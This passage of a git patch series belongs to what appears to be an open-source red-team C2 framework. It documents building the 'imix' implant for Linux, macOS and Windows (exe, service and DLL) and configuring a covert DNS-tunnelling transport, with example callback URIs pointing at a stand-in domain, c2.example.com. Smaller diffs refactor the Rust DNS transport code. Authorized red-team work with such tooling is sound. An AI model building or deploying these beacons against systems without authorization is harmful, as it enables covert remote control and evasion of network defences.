docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. + +## Installation + +The install subcommand executes embedded tomes similar to golem. +It will loop through all embedded files looking for main.eldritch. +Each main.eldritch will execute in a new thread. This is done to allow imix to install redundantly or install additional (non dependent) tools. + +Installation scripts are specified in the `realm/implants/imix/install_scripts` directory. + +This feature is currently under active development, and may change. We'll do our best to keep these docs updates in the meantime. + +## Functionality + +Imix derives all it's functionality from the eldritch language. +See the [Eldritch User Guide](/user-guide/eldritch) for more information. + +## Task management + +Imix can execute up to 127 threads concurrently after that the main imix thread will block behind other threads. +Every callback interval imix will query each active thread for new output and rely that back to the c2. This means even long running tasks will report their status as new data comes in. + +## Proxy support + +Imix's default `grpc` transport supports http and https proxies for outbound communication. +By default imix will try to determine the systems proxy settings: + +- On Linux reading the environment variables `http_proxy` and then `https_proxy` +- On Windows - we cannot automatically determine the default proxy +- On MacOS - we cannot automatically determine the default proxy +- On FreeBSD - we cannot automatically determine the default proxy + +## Identifying unique hosts + +Imix communicates which host it's on to Tavern enabling operators to reliably perform per host actions. The default way that imix does this is through a file on disk. We recognize that this may be un-ideal for many situations so we've also provided an environment override and made it easy for admins managing a realm deployment to change how the bot determines uniqueness. + +Imix uses the `host_unique` library under `implants/lib/host_unique` to determine which host it's on. The `id` function will fail over all available options returning the first successful ID. If a method is unable to determine the uniqueness of a host it should return `None`. + +We recommend that you use the `File` for the most reliability: + +- Exists across reboots +- Guaranteed to be unique per host (because the bot creates it) +- Can be used by multiple instances of the beacon on the same host. + +If you cannot use the `File` selector we highly recommend manually setting the `Env` selector with the environment variable `IMIX_HOST_ID`. This will override the `File` one avoiding writes to disk but must be managed by the operators. + +For Windows hosts, a `Registry` selector is available, but must be enabled before compilation. See the [imix dev guide](/dev-guide/imix#host-selector) on how to enable it. + +If all uniqueness selectors fail imix will randomly generate a UUID to avoid crashing. +This isn't ideal as in the UI each new beacon will appear as thought it were on a new host. + +## Static cross compilation + +**We strongly recommend building agents inside the provided devcontainer `.devcontainer`** +Building in the dev container limits variables that might cause issues and is the most tested way to compile. + +**Imix requires a server public key so it can encrypt messsages to and from the server check the server log for `level=INFO msg="public key: "`. This base64 encoded string should be passed to the agent using the environment variable `IMIX_SERVER_PUBKEY`** + +## Optional build flags + +These flags are passed to cargo build Eg.: +`cargo build --release --bin imix --bin imix --target=x86_64-unknown-linux-musl --features foo-bar` + +- `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport +- `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector. +- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI. + +## Setting encryption key + +By default imix will automatically collect the IMIX_CALLBACK_URI server's public key during the build process. This can be overridden by manually setinng the `IMIX_SERVER_PUBKEY` environment variable but should only be necesarry when using redirectors. Redirectors have no visibliity into the realm encryption by design, this means that agents must be compiled with the upstream tavern instance's public key. + +A server's public key can be found using: +```bash +export IMIX_SERVER_PUBKEY="$(curl $IMIX_CALLBACK_URI/status | jq -r '.Pubkey')" +``` + +### Linux + +```bash +rustup target add x86_64-unknown-linux-musl + +sudo apt update +sudo apt install musl-tools +cd realm/implants/imix/ +export IMIX_CALLBACK_URI="http://localhost" + +cargo build --release --bin imix --target=x86_64-unknown-linux-musl +``` + +### MacOS + +**MacOS does not support static compilation** + + +[Apple's SDK and XCode TOS](https://www.apple.com/legal/sla/docs/xcode.pdf) require compilation be performed on apple hardware. Rust doesn't support cross compiling Linux -> MacOS out of the box due to dependencies on the above SDKs. In order to cross compile you first need to make the SDK available to the runtime. Below we've documented how you can compile MacOS binaries from the Linux devcontainer. + +#### Setup +Setup the MacOS SDK in a place that docker can access. +Rancher desktop doesn't allow you to mount folders besides ~/ and /tmp/ +therefore we need to copy it into an accesible location. +Run the following on your MacOS host: + +```bash +sudo cp -r $(readlink -f $(xcrun --sdk macosx --show-sdk-path)) ~/MacOSX.sdk +``` + +Modify .devcontainer/devcontainer.json by uncommenting the MacOSX.sdk mount. This will expose the newly copied SDK into the container allowing cargo to link against the MacOS SDK. +```json + "mounts": [ + "source=${localEnv:HOME}${localEnv:USERPROFILE}/MacOSX.sdk,target=/MacOSX.sdk,readonly,type=bind" + ], +``` + +#### Build +*Reopen realm in devcontainer* +```bash +cd realm/implants/imix/ +# Tell the linker to use the MacOSX.sdk +export SDKROOT="/MacOSX.sdk/"; export RUSTFLAGS="-Clink-arg=-isysroot -Clink-arg=/MacOSX.sdk -Clink-arg=-F/MacOSX.sdk/System/Library/Frameworks -Clink-arg=-L/MacOSX.sdk/usr/lib -Clink-arg=-lresolv" + +export IMIX_SERVER_PUBKEY="" + +cargo zigbuild --release --target aarch64-apple-darwin +``` + + +### Windows + +```bash +# Build imix +cd realm/implants/imix/ + +export IMIX_CALLBACK_URI="http://localhost" + +# Build imix.exe + cargo build --release --target=x86_64-pc-windows-gnu +# Build imix.svc.exe +cargo build --release --features win_service --target=x86_64-pc-windows-gnu +# Build imix.dll +cargo build --release --lib --target=x86_64-pc-windows-gnu +``` + + +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. + +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns://?domain=[&type=] +``` + +**Parameters:** +- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` + +**Examples:** + +```bash +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" + +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" + +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" +``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. + +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 From ac32da5c2da1ac29736377e621c747463dd6d7bd Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Thu, 25 Dec 2025 12:49:02 -0600 Subject: [PATCH 16/17] debug assertions, constant for dns buf size, move docs section --- docs/_docs/user-guide/imix.md | 117 +++++++++++++++--------------- implants/Cargo.toml | 1 + implants/lib/transport/Cargo.toml | 2 +- implants/lib/transport/src/dns.rs | 11 ++- 4 files changed, 69 insertions(+), 62 deletions(-) diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index f291c861f..3c1bca382 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -33,7 +33,64 @@ Imix has run-time configuration, that may be specified using environment variabl | IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | | IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No | +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. + +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns://?domain=[&type=] +``` + +**Parameters:** +- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` + +**Examples:** +```bash +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" + +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" + +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" +``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. + +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 ## Logging @@ -178,63 +235,3 @@ cargo build --release --features win_service --target=x86_64-pc-windows-gnu # Build imix.dll cargo build --release --lib --target=x86_64-pc-windows-gnu ``` - - -## DNS Transport Configuration - -The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. - -### DNS URI Format - -When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: - -``` -dns://?domain=[&type=] -``` - -**Parameters:** -- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) -- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) -- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` - -**Examples:** - -```bash -# Use specific DNS server with TXT records (default) -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" - -# Use system resolver with fallbacks -export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" - -# Use multiple DNS servers with A records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" - -# Use AAAA records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" -``` - -### DNS Resolver Fallback - -When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. - -### Record Types - -| Type | Description | Use Case | -|------|-------------|----------| -| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | -| A | IPv4 address records | Lower profile, data encoded across multiple A records | -| AAAA | IPv6 address records | Medium profile, more data per record than A | - -### Protocol Details - -The DNS transport uses an async windowed protocol to handle UDP unreliability: - -- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) -- **Windowed sending**: Up to 10 packets are sent concurrently -- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks -- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails -- **CRC32 verification**: Data integrity is verified using CRC32 checksums - -**Limits:** -- Maximum data size: 50MB per request -- Maximum concurrent conversations on server: 10,000 diff --git a/implants/Cargo.toml b/implants/Cargo.toml index 32d1f3a3c..34a30e6d2 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -61,6 +61,7 @@ anyhow = "1.0.65" assert_cmd = "2.0.6" async-recursion = "1.0.0" async-trait = "0.1.68" +base32 = "0.5" base64 = "0.21.4" chrono = "0.4.34" const-decoder = "0.3.0" diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index bedf5abfb..f4695f44d 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -29,7 +29,7 @@ hyper = { version = "0.14", features = [ ] } # Had to user an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } -base32 = { version = "0.5", optional = true } +base32 = { workspace = true, optional = true } rand = { workspace = true, optional = true } url = { version = "2.5", optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 20c29adfd..cef8ece3b 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -10,6 +10,7 @@ use tokio::net::UdpSocket; const MAX_LABEL_LENGTH: usize = 63; const MAX_DNS_NAME_LENGTH: usize = 253; const CONV_ID_LENGTH: usize = 8; +const DNS_RESPONSE_BUF_SIZE: usize = 4096; // Async protocol configuration const SEND_WINDOW_SIZE: usize = 10; // Packets in flight @@ -215,7 +216,7 @@ impl DNS { socket.send(query).await?; // Receive response with timeout - let mut buf = vec![0u8; 4096]; + let mut buf = vec![0u8; DNS_RESPONSE_BUF_SIZE]; let timeout_duration = std::time::Duration::from_secs(5); let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) .await @@ -424,6 +425,7 @@ impl DNS { let data_crc = Self::calculate_crc32(request_data); + #[cfg(debug_assertions)] log::debug!( "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", request_data.len(), @@ -453,6 +455,7 @@ impl DNS { let mut init_payload_bytes = Vec::new(); init_payload.encode(&mut init_payload_bytes)?; + #[cfg(debug_assertions)] log::debug!( "DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", conv_id, method_code, total_chunks, data_size, data_crc @@ -472,6 +475,8 @@ impl DNS { self.send_packet(init_packet) .await .context("failed to send INIT packet")?; + + #[cfg(debug_assertions)] log::debug!("DNS: INIT sent for conv_id={}", conv_id); Ok(()) @@ -503,6 +508,7 @@ impl DNS { } } } else { + #[cfg(debug_assertions)] log::debug!( "DNS: Unknown response format ({} bytes), retrying chunk", response_data.len() @@ -705,6 +711,7 @@ impl DNS { /// Fetch response from server, handling potentially chunked responses async fn fetch_response(&mut self, conv_id: &str, total_chunks: usize) -> Result> { + #[cfg(debug_assertions)] log::debug!( "DNS: All {} chunks acknowledged, sending FETCH", total_chunks @@ -725,6 +732,8 @@ impl DNS { .send_packet(fetch_packet) .await .context("failed to fetch response from server")?; + + #[cfg(debug_assertions)] log::debug!( "DNS: FETCH response received ({} bytes)", end_response.len() From 8de4767f46a5ceb216f9058181a447d9fa4be164 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 26 Dec 2025 19:30:24 -0600 Subject: [PATCH 17/17] move url dep to workspace --- implants/Cargo.toml | 1 + implants/lib/transport/Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/implants/Cargo.toml b/implants/Cargo.toml index 34a30e6d2..9c40bb378 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -127,6 +127,7 @@ tonic-build = { git = "https://github.com/hyperium/tonic.git", rev = "c783652" } trait-variant = "0.1.1" uuid = "1.5.0" static_vcruntime = "2.0" +url = "2.5" which = "4.4.2" whoami = { version = "1.5.1", default-features = false } windows-service = "0.6.0" diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index f4695f44d..6f52aaad0 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -31,7 +31,7 @@ hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls" hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } base32 = { workspace = true, optional = true } rand = { workspace = true, optional = true } -url = { version = "2.5", optional = true } +url = { workspace = true, optional = true } # [feature = mock] mockall = { workspace = true, optional = true }